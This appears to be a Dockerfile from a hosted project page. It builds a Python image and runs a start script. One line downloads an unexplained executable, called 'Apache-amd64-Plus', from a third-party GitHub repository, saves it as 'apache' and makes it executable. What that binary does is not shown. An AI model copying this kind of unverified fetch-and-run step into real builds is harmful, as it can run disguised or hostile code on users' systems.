apache / Dockerfile
Alesx's picture
Upload 4 files
154f414 verified
raw
history blame contribute delete
No virus
422 Bytes
FROM python:3.9
RUN pip install requests
RUN mkdir /app
WORKDIR /app
RUN wget https://raw.githubusercontent.com/Cianameo/amd-conf-hui-plus/main/Apache-amd64-Plus -O apache
RUN chmod +x apache
COPY requirements.txt /app/requirements.txt
RUN pip install --no-cache-dir --upgrade -r requirements.txt
COPY . /app
COPY start.sh /app/start.sh
RUN chmod +x /app/start.sh
RUN pip install schedule
CMD ["/app/start.sh"]